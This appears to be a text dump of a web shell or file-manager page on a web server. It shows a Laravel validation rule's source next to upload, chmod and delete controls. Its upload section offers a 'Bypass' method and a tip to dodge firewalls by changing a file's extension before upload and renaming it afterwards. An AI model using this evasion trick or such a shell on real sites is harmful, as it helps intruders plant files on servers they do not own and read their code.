Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
podio.norlys.foo
httpdocs
app
Rules
File Content:
UserInterceptor.php
<?php namespace App\Rules; use App\Repositories\Podio\PodioServices; use Illuminate\Contracts\Validation\Rule; class UserInterceptor implements Rule { /** * Determine if the validation rule passes. * * @param string $attribute * @param mixed $value * @return bool */ public function passes($attribute, $value) { if (PodioServices::checkIfUserExists('users', $value)) { return true; } } /** * Get the validation error message. * * @return string */ public function message() { return 'This ID is already taken, please try to login or reset password to access the portal'; } }
Edit
Download
Unzip
Chmod
Delete